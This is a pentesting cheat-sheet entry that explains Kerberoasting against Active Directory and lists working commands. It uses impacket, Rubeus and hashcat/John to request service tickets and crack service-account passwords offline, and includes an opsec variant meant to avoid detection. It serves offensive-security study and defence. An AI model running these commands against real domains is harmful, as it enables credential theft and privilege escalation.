#Windows Security #Domain Privesc #Kerberoasting

Kerberoasting

When a user wants to access a Kerberos-protected service, the client asks the KDC (running on a Domain Controller) for a service ticket (TGS-REP) for that service's Service Principal Name (SPN). The KDC encrypts the ticket with the long-term key of the account the SPN is registered to, which is derived from that account's password, so that only the service itself can decrypt and validate it. The KDC does not check whether the requesting user is authorized to use the service; authorization happens only as a second step, when the client presents the ticket to the service. This means that any authenticated domain user can request a service ticket for any SPN in the domain, regardless of their actual permissions on that service.

Because the ticket is encrypted under the service account's key, an attacker holding a ticket can guess the password offline: derive the key from each candidate password, try to decrypt, and stop when the ticket's integrity check passes. No further interaction with the DC or the service is needed, so the only trace on the domain side is the ticket request itself (Event ID 4769 on the DC). This is the Kerberoasting attack. Two caveats: it is only practical against SPNs registered to user accounts, since computer accounts use long random passwords that will not crack; and tickets encrypted with RC4-HMAC (etype 23) are far cheaper to crack than AES (etype 17/18), which is why the tools below request RC4 wherever the account still allows it.

NOTE: Always pass the domain as its FQDN, since it is used as the Kerberos realm name; a short NetBIOS name will make the requests fail.

Linux:

# Enumerate user accounts that have an SPN (kerberoastable accounts)
impacket-GetUserSPNs $domain_fqdn/$user:$pass -dc-ip $dc_ip

# Request a service ticket for each of them and write the crackable hashes to a file
impacket-GetUserSPNs $domain_fqdn/$user:$pass -dc-ip $dc_ip -request -outputfile $file

# Crack the tickets offline with John
john --format=krb5tgs --wordlist=$wordlist $file

# Crack the tickets offline with hashcat: -m 13100 is RC4-HMAC (etype 23, the usual $krb5tgs$23$ lines);
# use -m 19600 for AES128 (etype 17) or -m 19700 for AES256 (etype 18) tickets
hashcat -m 13100 $file $wordlist

IMPORTANT: If impacket-GetUserSPNs fails with "KRB_AP_ERR_SKEW (Clock skew too great)", the Kali machine's clock must be synchronized with the DC (Kerberos rejects requests whose timestamp is more than 5 minutes off by default). Use ntpdate or rdate against the DC to do so.

Windows:

# Request service tickets for all kerberoastable accounts and save the crackable hashes to a file
.\Rubeus.exe kerberoast /outfile:$file
# Opsec variant: skip AES-enabled accounts and use the tgtdeleg trick, so only RC4 tickets that the DC would issue anyway are requested
.\Rubeus.exe kerberoast /rc4opsec /outfile:$file
